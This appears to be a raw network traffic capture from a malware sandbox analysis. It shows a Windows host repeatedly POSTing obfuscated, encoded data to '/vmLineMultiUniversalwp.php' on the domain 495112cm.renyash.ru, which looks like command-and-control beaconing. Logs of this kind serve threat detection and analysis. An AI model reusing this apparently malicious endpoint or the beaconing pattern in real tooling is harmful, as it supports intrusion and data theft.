                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IiMInv7B4vTUN0kFWsBqHGRClwaLiWaBWdqIkRhLFhhkJ67ryUOgkY1hVLvAq9OL6sijCdXIaqxt73G044BIa1hjIkfD4S8t9NHJixrm7i%2FVzpffy43boOjt8xYcKBVUve3SkX7x"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e753e1f43f3-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4422&min_rtt=1717&rtt_var=6055&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=62497&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          114 | 192.168.2.4 | 50122 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:10.376216888 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:10.733086109 CET | 2520 | OUT | Data Raw: 54 5b 5b 50 50 59 5a 5d 5c 5b 52 58 57 58 58 59 58 56 5a 5c 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[[PPYZ]\[RXWXXYXVZ\RPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:+@#+9Q%U(=<%!%]07V#.*(#(& [:X>!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:10.825119019 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:11.003950119 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkRbybBrU5UadU3aSZluRQlluReg6j8Gu9jH99OCNtrPk%2FaTt0z%2FNiJAincZ6CRJpsMabj6zWvhZtGhMiy4kkHGYMgGXMJMNlx17%2BOGjtg7CXMNFqIMYqUU%2FmiSc3YreZnzMPbsr"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e7a5f257c9a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1864&rtt_var=909&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=539541&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          115 | 192.168.2.4 | 50123 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:11.123374939 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:11.467452049 CET | 2516 | OUT | Data Raw: 54 5a 5e 53 55 5b 5a 52 5c 5b 52 58 57 5a 58 58 58 56 5a 5f 52 53 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^SU[ZR\[RXWZXXXVZ_RSQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.**/C#+5V'3 =25%Z$X$4.>S),+?6;\ >==;!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:11.592358112 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:11.855746031 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4jmhAv1ls4ljcIfU5ETOzLJFVZyiwoawmeTbvuWy9nCm5p4cSYasV6Pr6F6Em5tmchE3NKzWnmfXbXJPycFSg3B3D%2FDyNde62FOqAm8ObOCUBVzgdooji%2F88%2FArT0PQG990AHEk"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e7f2fd6c351-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4723&min_rtt=1630&rtt_var=6798&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2809&delivery_rate=55344&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          116 | 192.168.2.4 | 50124 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:11.985641956 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:12.342629910 CET | 2520 | OUT | Data Raw: 54 58 5b 50 55 5d 5a 54 5c 5b 52 58 57 5c 58 5e 58 51 5a 5f 52 51 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[PU]ZT\[RXW\X^XQZ_RQQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*94;)V%#(,"#>%&> ."Q(#Y*5 =:Y);!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:12.429588079 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:12.660885096 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vaZkDaJdav%2BxAi%2F%2FTMxjnmoiAA2mMUJBpZ45ifJe85eEciQFDiFZf8QrWnkqfWoMflNi8npnyeTaDNXMn00syLzMBNnN4OVPDKUDQ2xVmVBvklHD7SgdgpTn3GEc0jCp4UeeOETM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e846d6041c6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2377&min_rtt=1730&rtt_var=1943&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=211349&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          117 | 192.168.2.4 | 50125 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:12.780848026 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:13.139362097 CET | 2520 | OUT | Data Raw: 54 59 5e 54 50 58 5a 55 5c 5b 52 58 57 5b 58 5b 58 5c 5a 5d 52 56 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^TPXZU\[RXW[X[X\Z]RVQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:4 "&#)<1]6>9\0>V 5<$(5<4%*!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:13.225259066 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:13.500917912 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZbQtnYrUdgSbXLYWsvas%2FbQm%2Fl0OCT7zqno9BAbXtHkM2B6As4Jo0Jndvohue3un6tsrMtBTEElSF0JS1ov66v6WOF4siRha9HuF7Ma3F5Jzj1xPxXJ%2Bv93kXK3YTh8JrXq7%2Bko"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e896d277281-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2709&min_rtt=1954&rtt_var=2243&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=182545&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          118 | 192.168.2.4 | 50126 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:13.633030891 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:13.983128071 CET | 2520 | OUT | Data Raw: 51 5b 5e 53 50 5c 5a 51 5c 5b 52 58 57 53 58 5c 58 56 5a 53 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[^SP\ZQ\[RXWSX\XVZSRQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-) ;5& <*"=[&-4!.%+0(6#7=2_=!Y#!Y,
                                                                                          Jan 4, 2025 11:09:14.098030090 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:14.359785080 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1paruiI9GviLpGbNOgtIP2r7X%2B%2BUFaim1jdlFrF8zW22M7UdzHko99XL2vQ7dORH5PqCZlOOKbsg4Ame4a%2FZWjeVttxkDYB%2Bn87WAFY01iwybCVyMVoBAwgS%2BJ3YrZ2nzmO5OFW%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e8ecf408c8f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4357&min_rtt=1901&rtt_var=5625&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=67749&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          119 | 192.168.2.4 | 50127 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:14.488693953 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          120 | 192.168.2.4 | 50128 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:14.570020914 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:14.920711994 CET | 1844 | OUT | Data Raw: 54 5c 5e 5f 55 52 5f 53 5c 5b 52 58 57 5b 58 52 58 56 5a 5b 52 5c 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^_UR_S\[RXW[XRXVZ[R\Q[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D=*/A )' ?\*/1]#=[$.+!-9),?X*6 "^*;!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:15.014744997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:15.332885027 CET | 958 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPBwyGCAcFxizMjSxewHogvvrFvZ63y%2BXjWrrOoM1mdne1e45sdz%2Byyn0puJZuh%2F0VOXf77z9Lill9LkExbc%2F3dM7lg972Iu%2BPwFQ9KOjqd3gYOzfVFbWUSDG2Chqjz7L03mPf9j"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e948dc77c7b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8503&min_rtt=2028&rtt_var=13711&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=27120&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1e 3c 07 3b 0d 35 2f 37 05 3d 07 2e 5a 32 33 30 1c 2f 22 30 06 20 2c 24 02 38 31 32 05 27 0a 3c 59 2a 06 23 0f 34 20 30 08 33 1a 2a 5d 06 12 38 10 3f 5a 21 03 32 2b 2a 54 2a 1c 00 43 30 18 26 10 24 3e 2b 58 28 02 00 05 31 05 3e 0c 3d 11 0c 5a 2d 14 24 05 2f 3c 37 0c 35 03 21 53 08 13 20 1c 26 1f 20 0c 2a 30 1c 02 25 23 39 5a 30 03 2c 0d 3d 28 23 0a 30 00 21 03 2e 21 2c 05 3c 23 0a 5b 3a 58 27 05 3e 2e 2c 0c 24 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$<;5/7=.Z230/"0 ,$812'<Y*#4 03*]8?Z!2+*T*C0&$>+X(1>=Z-$/<75!S & *0%#9Z0,=(#0!.!,<#[:X'>.,$<"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          121 | 192.168.2.4 | 50129 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:14.688175917 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:15.045680046 CET | 2516 | OUT | Data Raw: 51 5e 5b 57 55 5f 5a 55 5c 5b 52 58 57 5a 58 5c 58 53 5a 58 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^[WU_ZU\[RXWZX\XSZXR\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-), *20 **"-=]'>V %+?/_?%(49=;!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:15.140857935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:15.402926922 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0KcrBB0GnXUaZRj4wdBCNd2Avkq0NNTht4VwJLOlkjgVFalcqomkE9vIu9qLV2aa8zX2J%2Flb7nI%2Bo8cyVsASd7jo%2BYeUDfvpYbHkA9wjhAmnLnYp7z9MGyPwty44oGXQecgZyK3"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e955a6843b1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=10241&min_rtt=1743&rtt_var=17651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=20937&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          122 | 192.168.2.4 | 50130 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:15.531363010 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:15.889379978 CET | 2520 | OUT | Data Raw: 54 5e 5e 55 55 53 5a 53 5c 5b 52 58 57 59 58 58 58 55 5a 5a 52 57 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^UUSZS\[RXWYXXXUZZRWQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*481 )?:!)$+#>?#Y?%77:[);!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:15.995697975 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:16.180206060 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2FL7pCs72Rp9PdnTHNbQsiuh%2B%2BPrcMAodYAlm7qFGgMxotL4tF%2BeATDxvDsMKcyrHCebvATLztczMKdQtq8NpGJz2bDmfq4MR0%2FDSMXyXL1f2F6QZE0VKL5G7jHZVwH%2Fx8ULC7B%2B"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e9aae10c402-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3081&min_rtt=1519&rtt_var=3694&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=104144&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          123 | 192.168.2.4 | 50131 | 104.21.38.84 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:09:16.311307907 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:16.670650005 CET | 2520 | OUT | Data Raw: 54 5a 5e 55 55 5d 5f 56 5c 5b 52 58 57 5c 58 5e 58 50 5a 5f 52 56 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^UU]_V\[RXW\X^XPZ_RVQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=9E#+*%'><2#=\0X#R4>>S(?3]?%$49*;!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:16.763010979 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:16.942523003 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
